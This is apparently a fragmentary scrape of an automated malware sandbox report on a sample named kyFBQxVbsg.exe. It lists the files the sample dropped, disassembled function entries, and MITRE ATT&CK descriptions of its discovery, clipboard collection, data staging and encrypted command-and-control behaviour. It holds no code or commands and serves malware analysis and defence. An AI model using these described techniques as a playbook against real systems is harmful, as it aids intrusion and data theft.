C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pshfc5wv.vht.psm1

C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\forbas\scxs.dat

C:\Users\user\Documents\20220626\PowerShell_transcript.128757.EFYe5VSb.20220626094450.txt

Static File Info

General

File Icon

Windows Analysis Report
kyFBQxVbsg.exe

Function 024ADA50 Relevance: .7, Instructions: 721
COMMON

Function 024AEAB8 Relevance: .6, Instructions: 566
COMMON

Function 0241D128 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 0241D123 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Function 024A0468 Relevance: 1.4, Strings: 1, Instructions: 110
COMMON

Function 024A07D0 Relevance: .1, Instructions: 97
COMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre